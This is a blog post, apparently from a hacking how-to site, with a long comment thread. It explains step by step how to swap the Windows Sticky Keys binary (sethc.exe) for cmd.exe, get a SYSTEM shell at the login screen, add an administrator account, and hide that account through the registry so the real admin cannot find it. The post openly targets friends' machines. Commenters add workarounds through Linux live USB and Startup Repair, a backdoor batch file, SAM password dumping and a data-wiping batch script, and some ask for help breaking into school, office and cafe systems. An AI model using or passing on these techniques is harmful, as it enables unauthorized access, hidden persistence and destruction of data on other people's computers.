Gain admin access on windows system using your guest account

Hello All,

Ever thought of how to get into your friend’s system and see the access denied files and folders? Or ever wanted to hack into someone’s admin account? Well here is a method which exploits yet another windows bug.

  1. Have you ever noticed that if you press your system’s SHIFT key >= 5 times continuously a pop up windows occurs with the name “Sticky Keys”? If it doesn’t pop up on your comp, then may be your shortcut is turned off. For enabling it, goto Control
    Panel -> Accessibility Options
    . In the accessibility options under the
    keyboard tab, in sticky keys , click on settings and enable the
    shortcut for sticky keys. And u can do this even with a guest account.
  2. Finally if the following 2 requirements are setup on your system, then you are all set to enter into your admin’s account.
  • On Pressing SHIFT >= 5 times, a pop up should appear.
  • The windows System32 directory should be writable.

When u press, the SHIFT key >= 5 times, a file with the name “sethc.exe” is
executed.  You can verify this in TASK manager (don’t close the pop up
window). This file is located in C:WINDOWSsystem32 folder, or
where ever your windows is installed.

The Vulnerability

  1. When SHIFT key is pressed >=5 times, windows executes a file named
    “sethc.exe” located in system32 folder. It doesn’t even check if its the
    same file. Also it runs with the privilege of the CURRENT USER
    which is executing the file i.e if u have logged on as a guest then in
    the TASK manager under processes, it shows your user name as guest.
  2. The file executes even if u log off, and have the windows login screen is

If u understand this much, then the exploitation is very simple for you. What we will do is that,
we pick cmd.exe , copy it at a folder other than system32, (because windows
won’t allow u to copy) rename it to sethc.exe, go to system32 folder,
and paste it. Windows will ask, “that another file exists, do u want to
replace?” and after pressing OK, you have replaced the sethc.exe with ur own
cmd.exe. Now if u press SHIFT key >=5 times, a command prompt will


  1. Now log-off or restart. When you reach the windows
    login screen, press the shift key >=5 times. A command prompt will
    pop up with SYSTEM privilege.
  2. Enter the normal commands as follows:
  3. net user username /add
  4. net user localgroup administrators username /add
  5. And a new user called username with admin privilege will be added.

And thats it, you have admin privilege of the system and you can do what ever you want to with it.

Hiding your fake admin profile
Now you surely don’t want the real admin to track you. Here is what you will have to do to hide yourself from login screens as well as from control panel

  1. Goto registry editor and open this place.
  2. [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList]
  3. Here create a new DWORD value, write its name as the “user name” that u created for your admin account.

Thats it now you are invisible but still admin of the system. Live as admin forever and keep screwing the real admin forever.

Last but not the least (IMPORTANT)
Windows has two type of login screens:

  1. Where the accounts are listed with some pictures.
  2. Where u have to write username and password.

After making the hidden account u will have to login through the 2nd step only. If ur login screen is of Type 1, press ALT-CTRL-DEL twice to get the 2nd type screen.

Thats it!!!

This is a sureshot way to gain admin, if u r a lamer or a newbie
then please do some googling.
I have written almost every detail.

Thanks for reading this far 🙂 Make a comment if you liked this one.

Thanks for digging and shouting it out to your friends.

  • Great Stuff!

  • Thanks Yasser miyan, it surely works. Try this out when ever you get a change to try out

    • is it possible to do the same thing in windows 7

  • truly

    nice one,,,,but i already knew this stuff 😀 ,,,,wud b nice and more inetresting if you get into .bat files….they are nice and u can help people making thr own virus….i tried a few and tried thm on my system and ended up at a position whr FORMAT was the only solution 😛 …..

  • Hi Truly,

    First of all thanks for your comment.

    Well .bat files are not the best ways to do it. What I have described here is a clean and neat process. Tried it several times on my system with no problem what so ever. Do give a try in your free time and i m sure this won’t force you for a re-format.

  • truly

    oye,,,i meant write a blog abt .bat files,,,so people can get to know how dangerous these small files can be which cud b easily made in notepad….

  • aah…cool will surely try to find a hack using them, though there exists a lot using them.

    Why don’t you chip in with a few posts if you have any idea of how to use these .bat files to gain such admin access, I will acknowledge you for the same 😛

    • sivaramsharma

      while copying this bat file it is not copying so what should i do please reply

  • truly

    i hav made a couple of bat files but i think no one wanna try thm coz the result u know,,,,,and they were not for hacking into acct rather they were meant to be used to fuck the data…. 😀 which i tried and yes i got fucked ,,,, so if u want i can write a post and tell people how to go ahead for this 😛

  • hehe, I am not sure anyone is going to try for that one. And also I guess in my views only 3-4 lines of .bat file will screw up your whole data 😛

  • truly

    yeah very true




    ECHO This is a batch file




    DEL PATH*.*


    FORMAT E: /U



  • Sowmya


  • manish


  • Pingback: Huge windows vulnerability()

  • vaishnavi

    🙂 nice stuff..

  • Indrajeet

    Its quite surprising that a guest will have write permissions to the System32 folder and that too to overwrite an already existent command because the paste function is invoked with guest privileges. I don’t have a windows machine here but would have loved to try this out and have a nice laugh at windows security.

  • Yes as I said the two requirements for this to succeed are that:

    1. System32 is writable
    2. Sticky keys enabled

    I have the snapshots above which I have copied from the trackback link to this blog post. Enjoy !

  • tushar ..

    mast hai yaar jhantu and truley …
    didn’t knew this stuff ……
    or even thought about it ,,
    all i knew was 1 thing while playing if
    sticky key was kept on the further game was
    surely screwed !!!!!!!

  • hehe, yaa kindda funny and wierd bug it is, which shows that no one is safe with windows on their systems 🙂

    Though I still use them 😛

  • matthews

    truly you should make a .bat that installs sp3 firefox and avg removes malware etc then we would have a quick technician script you can run as admin without hassling the user and we can have it delete the account when its done. Hack your way to security

  • hehe… 😉

  • matthews

    @ admin I’ve been a linux user for a while Mint is good if your hardware is supported. I dual booted for a year but I don’t want Vista on my new machine and the price of xp was outrageous. At any rate I find Linux usable but the think I miss most is the software aisle.

  • Well I use Windows XP one of my lappy and Vista on the other. I must confess both sucks, but still makes day to day life easy. Regarding linux, I use Ubuntu using VMWare on windows itself. Plus all my web servers are linux, hence I do enjoy linux too…..

    But i understand the software aisle you are talking abt.

  • zeebo

    I’m confused about finding a cmd.exe and copying it without finding it in the system32 folder. I can’t find it anywhere else. Can anyone tell me how to do it. Sorry for the newb question 🙂

  • Didn’t you find that in your system32 folder? Thats in the system32 folder for all the windows version as far as I know.


    Put the above in your browser and it will prompt you for saving the same. Save it on your desktop, make the necessary changes and hurray 😉

  • apin

    hey it won’t work when i tried to copy sethc.exe access denied ,the system32 isn’t writeable but the sticks keys is enabled

  • Yes as I wrote before 2 pre requisites for this is that you should have stikey’s enabled and then system32 writtable.

    Change permissions so that you can write to that folder and try again.

  • apin

    i’m a newbie, if you don’t mind, would you tell me how to change permissions from guest acc,is that possible to change permissions from guest acc?

  • I always read your blog in high spirits. Thanks 🙂

  • Robbie Mosaic Fan

    Ah… Yes, I use this exploitation to play with my computer (and once a computer in the university lab). Also the way to prevent this exploitation is to use NTFS and doesn’t allow normal users modify executable files, especially those used by Administrators.

  • Robbie Mosaic Fan

    Or to be more precise, use NTFS to prevent users to modify ANY files that are used by the system and Administrators.

  • Robbie Mosaic Fan

    And in addition, never give power user or administrator privileges to whom you don’t trust. 🙂

  • W8b8mS Hello!,

  • jon

    System32 isn’t writeable from a guest account. If you have priviledges to change System32 to being writeable, you already have admin access so wtf is the point of this?


  • Hello!,

  • Hi!,

  • Good day!,

  • sree

    Cool man…really cool…
    it worked when at home…
    But in office system32 is not writable…
    u got anythin to overcome that????

  • First of all thanks a lot sree for the comments, that will satisfy a few of the above commentors.

    @jon , well I guess Sree’s comment will satisfy your question ( wtf 😉 )

    However I do agree that in office its unlikely that you will get the system32 writable but then use this trick to hack you friends computer if not the office one. You will be able to do all this on personal computers where they really don’t care to make system32 un-writtable.

  • noone

    Problem. guest accounts disabled in winxp. users and pwrusers group only have read and exec priveledges, as with EVERY tut about gainingi system or admin access, this one is no different, if there are no priveledges to modify then you cannot apply any work around. This is a neat trick, but of course, you have to have the modify attribute set in the group that your login is assigned to.

  • Alex

    They said it, by default the system32 folder is write-protected from guest accounts.

    you should make a blog on how to make them write-able from the guest accounts.

  • Is there any way to make system32 files writeable from windows XP guest account ?
    plz answer .

  • Well I don’t think it is possible unless your guest account has the required privilege. I used this technique generally on my friends computer where I am logged in already as admin. I set the whole thing up and then simply try out later when he is not thr 😛

    If you are trying to hack through your Computer Center or something of the sort, I am afraid that you can’t make system32 writable from guest account.

  • FrereOP

    You can gain access to the Windows System account (higher up than Administrator) then use this account to change the read/write privileges in the System32 directory.  Be careful as the System account is the equivalent of a LINUX root account and you can easily stuff your system! Presumably you could also add users from here but the less you use this account the better!

    Search Google to find out how to gain access to the System account using the “at” command.

  • A.M.

    I tried to paste “cmd.exe” in “c:windowssystem32” as “sethc.exe” on “Exploitation” but it failed?
    Please help me.

  • What message do you get exactly when you try to copy the file?? Can you provide some details?

  • anarchist

    Ahoy! I have the same problem. The message what I get says:
    Cannot copy sethc.exe: Access is denied.

    Make sure the disk is not full or write-protected and that the file is not currently in use.

  • If you can’t make System32 writable, you could use a Linux Live CD (or USB) to copy the cmd to System32. Tha’s what I did in my school.

  • FrereOP

    Accounts with” Use”r privileges (including the Guest accout) do not have write access to System32 and some programs (Execute privileges) are disabled as well including the “at” command” which is the key to getting to the System account.  This will give an “Access is Denied” error.

    However, accounts with “Power User” privileges do have execute access and will work.

  • Abhi, you’re a master 🙂

  • Amirz

    Great article thx

  • amira

    hey good trick!

    im trying it but also i got the same says disk is full..hmm tnx for the article!!!hope to see more from u,,keep me updated pls

  • thanks for the account hiding trick..
    havnt tried yet but i hope it would be very useful for me if it really works!!

  • I’m tempted to say “what a load of crap!” just for the sake of irony, but I’ll refrain

  • FrereOP

    If you are really stuck (you have a User rather than a Power User or Administrator account), then resort to LINUX for help.  If you can boot a LINUX live CD such as Ubuntu, you can do it in situ.  If booting from a CD has been disabled in BIOS you may be able to re-enable it but if the BIOS is locked as well and you can’t, you will have to physically remove the hard disk to another machine that can boot a CD from.
    Use the LINUX distro to do the replacement of sethc.exe with cmd.exe in the system32 directory.  A LINUX root account will not honour the ownership prievileges of your NTFS disk although it may honour the read-write/read-only status of the file.

  • Thanks buddy, this is working the way I want.

  • Thanks buddy!

  • linuser

    thanks everyone for their tips.
    Abhinav yaar can u plz share how u got this webpage…. i mean are u hosting on your own comp.. or on other server.

    I am planning for a webpage but not getting a head start…. 🙁


    I tried to do all what you gave me but the sethc.exe I replaced with cmd.exe after renaming failed to work when I restarted the machine the cmd prompt and the logon screen said the syntax of this command is NET USER and failed to work


    why does my cmd Prompt does not show
    WINNT it shows windows and when ever I try to Change it gives a msg reading Sytem error 5 has occurred

  • And what for such complexities, it is better to reinstall windows, to make all customisations and all

  • Oliver

    Its a definet method of gaining access but what if the privaleges of copying and pasting into the “system32” folder have been enforced??

  • Nicely done 🙂

  • Fogal

    I need admin rights on windows 2008 server
    but im a guest acc, how do i by pass this, my cmd is disabled.Please.

  • vignesh

    it is not working

  • Elite

    i have tried but all system 32 is denied to my account it would have work if it wasnt denied

  • Henry

    I cant hack into administrator a/c of cyber cafe’s with high speed internet.Are they protected somehow?

  • solomon

    thanks alot.

  • Needshelp

    its not letting me copy sethc (cmd) to system32: it says: Cannot copy sethc: Access denied. Make sure the disk is not full or write-protected and that the file is not currently in use. Plz help me out.

  • what if the admin disable the Stick key from the start ?????? and no control panel

  • david

    sethc.exe can’t replace the original sethc file it! why is that? anyone can help me

  • gr8 work….

  • ZAC

    ok so when i go into systum32 and find the file it says “sethc” only there is no “.exe” at the end. so do i just re name the cmd file as just “sythc” or am i screw? please reaspon asp ty 🙂

    • midhun

      same is to me also there is only SETHC “.exe” is not there

  • dwayne

    but it says “access denied” when copied to sys32 folder.”make sure that the disk is not full…”how to?please help

  • Sandeep

    And if the person does’t have the rights to modify system 32 folder then coz in and org we usually don’t get these rights so help me in this synario bro..
    waiting desprately..


  • nas

    my system 32 is not writable,cuz iam using a guest can i make it writable using guest account?

  • pald

    How does it work if your guest account don’t have privilege? I tried this and it keeps on saying access denied…

  • Jon

    When I press shift 5 times once logged off, I get the noise of sticky keys being turned on. Not cmd. I have replaced the sethc.exe with ‘cmd.exe’ (renamed sethc.exe)

  • Pingback: How to hack administrator password from GUEST account()

  • Jack

    Hey, i tested this out on my computer and once i copy the cmd.exe to another folder and rename it, it wont let me place it in the system32 folder and says i need administrator access for that. Is there a way to circumvent this access request or did they fix this windows bug? any help you can give me would be greatly appreciated

  • alex

    hi im currently going throught the steps and i’ve got to the part were you have to replace cmd.exe with sethc.exe and i still can gain acsess to system32

    • Hi Alex and Everyone, This is an old trick which used to work with various versions of windows. I am not sure if microsoft already fixed this issue in latest releases of windows.

  • Dr Abinet

    Hey I want to hack our schools server pls could any one help me?

  • bala

    hello guy this is an idiotic
    because you cant replace the file
    because windows is already write protected???
    even you can’t rename it???
    don’t be an idiot…

    • midhun

      yes its true

  • رقبة


  • Hi Friends,
    Nice Post,I am also interested in learning
    ethical hacking and finding out the security loopholes in OS,network and fixing them up. I recently did a course on ethical hacking from, this course gave me detailed insight of hacking,learning and training. I would recommend to do this course for everyone interested in networking security and ethical hacking. They also run linux,java courses and also have online and distance learning program.


  • savan

    i cant copy sethc.exe from guest account…. any solution for this


  • Vikash

    Yar pls help me cannot replcaHow to fix this pls help its urgent “Cannot copy sethc: Access denied. Make sure the disk is not full or write-protected and that the file is not currently in use”

    pls help anyone

  • deee

    If sys 32 in not wratable then what??????
    and if the seth file does not say exe. is it still the correct file?

  • pleasehelp

    hey man i have a problem i cannot copy the command prompt that i have named sethc file to system 32 i am on a guest account plz help me!!

  • fawi

    this is pretty stupid, what’s the purpose of doing this when you don’t have administrator rights to copy on system folder?

  • Shashikant


    “What we will do is that,
    we pick cmd.exe , copy it at a folder other than system32, (because windows
    won’t allow u to copy) rename it to sethc.exe, go to system32 folder,
    and paste it. Windows will ask, “that another file exists, do u want to
    replace?” and after pressing OK, you have replaced the sethc.exe with ur own
    cmd.exe. ”

    How can copy and replace the sethc.exe after renaming cmd.exe to sethc.exe file in Windows/system32 directory as a guest.
    It says “Access is denied”.

  • window cant allow me to paste cmd”s renamed file called sethc.exe??????????

  • Omar

    I have the same problem. I get to the replace part, but when I try and replace the files, it asks me for admin password…

  • akil

    hey buddy dont mess up evrybudy.;System32 isn’t writeable from a guest account. If you have privileges to change System32 to being writeable, you already have admin access so wtf is the point of this?.jon is absolutely correct,;the trick is clear and good but of no use.;you cant even perform with power users;i tried it,anybody will get message like;access denied….
    dont waste time , go find another place…..

  • khan aqib

    i cant break admin password with Guest account.anybody can help me

  • john

    Very cool. Just have a small query..if I add files to guest account,do they automatically get added to the admin a/c aswell? If they get deleted when I delete em frm the guest a/c?

    • hitesh

      i cant edit sysytem32 files
      access is denied
      plz help

    • Kevin

      If I wanted to remove the cmd shortcut so that any trace of tampering could be removed, could i just replace the cmd (renamed sethc.exe) with the original sethc.exe which I copied onto my flash drive? After i created a new admin, of course 🙂

    • i reli need smethng for my skul computer lab they have blocked evry thng evn system 32 cant be modified

    • Bat file for making backdoor
      cd windows
      cd system32
      copy cmd.exe d:
      ren cmd.exe sethc.exe
      cd windows
      cd system32
      ren sethc.exe my.exe
      copy sethc.exe C:WindowsSystem32
      @echo Backdoor have been Created
      @echo You can change it By command as – NET USER *

      now save it as .bat extension and it will make a backdoor on ur xp logon screen by just press shift 5 times…

  • krishna Gupta

    “net user localgroup administrators username /add” is not executing..

    System error 1376 (i.e specified local goup does not exits) COMES.

    what to do now..!!
    plz help

  • MullahCrazedNiccuh

    Hey Akshay…hope this helps you..
    U can download this bootable iso.””(only 3 mb its zipped)..create a bootable usb drive(u can use Unetbootin or YUMI) and boot via it and clear the administrator password from the computer u wanna use n abracadabra!no password needed to log in to admin..u can access anythn u want

  • MullahCrazedNiccuh

    Hey Akshay…hope this helps you..
    U can download this bootable iso.””(only 3 mb its zipped)..create a bootable usb drive(u can use Unetbootin or YUMI) and boot via it and clear the administrator password from the computer u wanna use n abracadabra!no password needed to log in to admin..u can access anythn u want

  • MullahCrazedNiccuh

    Hey Akshay…hope this helps you..
    U can download this bootable iso.href=”” its only 3 mb then create a bootable usb drive(u can use Unetbootin or YUMI) and boot via it and clear the administrator password from the computer u wanna use n abracadabra!no password needed to log in to admin..u can access anythn u want

  • Balu

    Yes it is indeed wonderfull.
    This is better than other windows password recovery tools.
    I was able to do it in the second go.

  • saurabh ahuja

    hello sir ,
    sir i have problem in copying the sethc.exe in system32.plz give me answer as soon as possible..

  • Mr.Singh

    The information provided by you is really intresting and new for me, but there is one problem that came in front of me when i tried to change the administrator password using guest account.When i logged in using a guest account it the SYSTEM32 folder becomes read only and windows don’t allow me to make any changes in system32 folder due to which i cannot replace the SCTCH.EXE file .

    Please reply me the solution what i can i do to change the password of admin using guest account. As, the SYSTEM#@ is only read only.

    Thanks in advance

  • et phone home

    this hack does not work for computers with high security, I tried every way to get the files to go in to system32 but get access denied for copying WTF. Apparently the admins know of this hack and have protected the computers, the sethc.exe does not even show up in the system32 i had to search it.

  • Hello, this hack is too old now and you should update it.. and also, only few systems would allow Guest accounts to overwrite system32 files…
    you can try this …

    1. Download Ubuntu or any linux with GUI (for noob purposes) Ubuntu 11.04 or 10.04 would do.
    2. Install it on a USB thumb drive using either unetbootin or universal installer from pendrivelinux
    3. boot from the USB drive
    4. a window would ask you if you want to install ubuntu or try it. select try it.
    5. goto HOME folder.
    6. in the upper left side of the window, you could see Mounted drives, select the first drive in the list. take note, it would have an icon of a hard drive.
    7. double click that.
    8. if you saw a folder named Windows, that’s the drive we want, if not, try the others in the list.
    9. in the drive we selected,
    GOTO Windows> System32
    10. now find CMD.exe, copy it and paste it on the desktop, rename it SETHC.exe
    11. then drag the renamed CMD.exe from the desktop to the folder System32.
    you would be ask if you want to overwrite the existing SETHC.exe, click Yes to confirm.
    12. Reboot. the hack would now be possible.

    you can press the shift key, 5 times to bring out the Command prompt

    (this would only possible if you successfully followed what i have said earlier. IT’S 100% WORKING, TRIED AND TESTED ON DIFFERENT SYSTEMS, INCLUDING NETWORKED COMPUTERS FROM COLLEGE UNIVERSITIES) ^_^ thankx

  • Omega.

    Hey all of you,
    First of all the system file does’nt get replaced.Someone help me wid [email protected] as you asked what message comes and provide some info about dat it comes access is denied.The file is being used by someone else.Dats what comes.Please help me.

  • Omega.

    Does ne1 noe how to store input in a bat or vbs file???

  • noob

    when i tried to copy the sethc.exe into system32 it said I needed the admin password which is a real problem for me because I am only doing this cuz I changed my password a while ago and forgot what it was so I need to use “net user administration *” to change my password

  • Anas Abdalla

    I’ve Juts do it using mini win xp fron Herin’s bootable CD to replace sethc.exe file, and it works just fine.

  • johnny darwin



    Worked like charm

    My son is so happy (and afraid also, as now he cannot hide his files, I will CRACK his admin password)



  • dude

    How do you take it back to normal? Which files need deleted out of c?? Please respond soon really need to know

  • Nice

    Thanks, nice stuff.

    I liked the phrase “Live as admin forever and keep screwing the real admin forever.”

  • prakash

    just follow MullahCrazedNiccuh idea of booting with llinux from USB and copy the SAM(the file where windows store all users password) file located in windowssystem32config copy it, paste it anywhere, eg: pendrive,. open the SAM file after you reboot the computer then you will find a long code then u can google it to decode it into plain text….

  • Can’t drag the new “sethc.exe” file to System32 folder 🙁

    • Nice

      To my knowledge this will only work on a window xp system without service packs. Service packs cover up these holes in the operating system.

  • Quadri Imran

    Hey Bro! What if id dont have system32 folder only redable this trick wont worked for me please give something which will work for me!!!

    • Aniruddh Agarwal

      Worked like a charm with the Linux method! My little brother forgot the password of the only account of his PC, but fortunately he still had a guest account with which I activated Sticky Keys. The rest was done by Linux!

  • poopy head

    i tried but i cant copy into system32

  • Diell Morina

    Hey, everything’s good, but the I can’t turn on the fuckin sticky keys!! I can change it by Eease of Access nor by Narrator before loggin’ in(when you have to choose which user you want to log in). When I turn it on from Ease of Access it doesn’t do anything, even though I press sticky keys like 1000000000 times. Also when I try to do it by he Ease of Acces(narrator thingy)before loggin in, it pops up a message”error starting sound agent. There may be no sounds for FilterKeys or StickyKeys”, and doesn’t let me press OK and change the pass’.

    Please help!

    • Prankster855

      It starts up, goto your task manager.

  • Demolition Man

    it’s working with win XP sp2 only

    are you have another way for win 7,8 or xp sp3

    thanks alot

  • I’ve just done it on Win XP SP3, works like a charm, I’d blow the admin if he was in front of me at the time.

  • Exerver

    I tried this on my school network, sadly I can’t overwrite files in the system32. Any way to get passed this?

  • Josh

    It still asks me for admin privliges when a copy the sethc.exe(cmd.exe) file to system 32 please tell me if i did anything wrong like skipped a step

  • MKJ

    Peoples are more interested in such stuff then xmpp. heheh 😉 :p

  • Verity

    Hey, i’m trying this because i forgot my admin password and my guest account doesn’t let me download anything. I’ve done everything, but the last couple of steps aren’t working. I’ve typed “net user username/add” and entered and then “net user localgroup administrators username/add” But no new user has been added?:| help

    • Prankster855

      o:dp username (SPACE) /add DERP

  • midhun

    i had changed CMD into sethc.exe but i cant copy it again to my windows system 32 file. what should i do

  • Bob

    A few days ago, I had met the headache things that I had forgotten Windows login password. The login screen rejected my passwords. I was frustrated because there was very important data on my disk and I couldn’t reinstall the OS. ………….
    However, I fortunately got to know the PCUnlocker utility, which is a professional windows password recovery tool for us to reset windows password instantly yet no data loss.

  • Jonathan Cauthorn

    Correction to this step:
    net user localgroup administrators username /add
    should remove the “user” and should read:
    net localgroup administrators username /add

    Simple typo.

  • Nurul Hidayati

    okay, i’m having this problem
    I have a computer but the admin is my brother, he put parental control that only allows me to open my pc for few hours and then it locked by itself years ago and still don’t want to give me his password. I can’t do anything with this PC, from downloading games, songs and videos from Internet to even copy and paste my documents. I can’t even do anything with it and just even thinking of it makes me want to smash it to pieces. Is there any ways to remove my brother’s admin password or account without using Password Reset CD or USB drive, I mean just from the guest account. I know just from the sound of it, is quite impossible but please help. I don’t want to reboot or anything

    • Hugh Giles Guansing V

      leave me a msg on my fb.. il help you

      • Nurul Hidayati

        i already leave u a message in ur fb ( i only search ur name on fb, not sure if it yours )

  • Kitale Nudeet


    Apr 09, 2014

    the “renaming” way on the 1st method doesn’t work and most of people see this too!

    “Cannot move sethc.exe(to System32): Acess is denied
    Make sure the disk is not full or write-protected
    and that the file is not currently in use.”

    But I know how to fix this!

    1. Turn on the Computer then force it to turn off.

    2. Turn it on again and it will ask you to launch “Safe Mode”, “Safe Mode with Networking”, “Safe Mode with Command Prompt” and “Start Windows Normally”. Choose “Start Windows Normally”. Then quickly hit “Ctrl+Alt+Delete” and the system will restart.

    3. It will have only two choice for you to choose is
    “Launch Startup Repair” and “Start Windows Normally”. Now choose “Launch Startup Repair”.

    4. Wait for Windows’s stuffs to load and a dialog will pop up to ask you like this. “Do you want to restore your computer using system restore?” choose Cancel. And a bit later another dialog will pop up saying “Startup repair cannot repair this computer automatically”. If this doesn’t pop up so do step 2, 3, 4 again

    5. The dialog will ask you to “Send information about this problem”, “Don’t send” and the important part is “View problem details”. So ofcourse, Click on the drop down in front of “View problem details” and scroll down to the bottom part and it is a local link Similar to this “C:/Windows/System32/en-US/erofflps.txt” click on it

    6. Bang!! it opens up a text document in notepad. (it’s more and more exiting) click at “File” then “Open” or just press “Ctrl+O” and it is a file explorer!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

    7. Locate the folder C:/Windows/System32 and find cmd.exe but you actually can’t find it! Why?!!! Oh no! Don’t be worry bloodstriker can help you. Look at the bottom of the file explorer it is a dropdown list called “Files Type”. Change it to “All Files”. Now copy and paste “cmd.exe”. Rename “sethc.exe” to any thing you want and rename “cmd – Copy.exe” to “sethc.exe”

    8. Happy ending click “Cancel” next close Notepad then click “Don’t Send” and click “Finish” The system will restart and do step 5-9 in this tutorial and Bravo!!

    Read more:

    • Nurul Hidayati

      done all but at last the system didn’t restart.

    • Theofficialspeech

      U can just open with command prompt. Type Notepad.exe. Hit ctrl+O. And do your stuff 😉

    • Dwight

      Thanks bloodstriker, without you this tutorial would have been incomplete

  • arjun

    Those are good ones! Thank you! very usefull info to everyone easily getting this thanks admin

    How To Make Money With Smartphone

    Most Selled Mobiles In India

    How To Make Money With Flipkart

  • Guest

    Correct Registry:
    HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList

  • Jonathan Cauthorn

    Correct Registry key:

    HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList


    “The value of 0 hides the user account from the welcome screen. However the user account is still visible under the control panel. The value of 1 shows the user on the welcome screen. The last possible values is 65536 (0x10000). That value hides the user account as well from the welcome screen as well as from the control panel.” – Norbert Willhelm

  • Dwight

    I know I’m two years too late but I signed up especially to thank you man…keep up the good work

  • Hugh Mungus

    I know im late, but after i click ok to replace sethc.exe it says i need admin access to copy to this folder. Im using win7 enterprise if that helps anything

  • snipe

    …except the guest account can’t replace or rename, OR delete files in the system32 folder, nor can they write to the registry. So this entire tutorial is pointless.

    also it’s spelled ‘you’ not ‘u’

  • Gman Smith

    Even if system32 isnt writable, you can use a linux liveboot, remount the windows drive as r/w, chmod it, and do it that way 😉

  • Zey

    does this works on hp premium windows 7 laptop

  • Zey

    Does this process work for a HP home premium Windows 7 Pc laptop
    [email protected]
    From: Zey
    Contact me please and thank you

  • CrackEdge

    How to do the same in window 8.1?
    <a href="; Best New Apps

    • Barmine

      The above exploitation also could be used to reset lost Windows 10 and Windows 8 password. But the steps are a bit different, you can check this tutorial. Good luck!

  • Badal Kannaujia

    System ask for admin permission when I copy new sethc.exe so…
    How I will step…
    So tell how it will work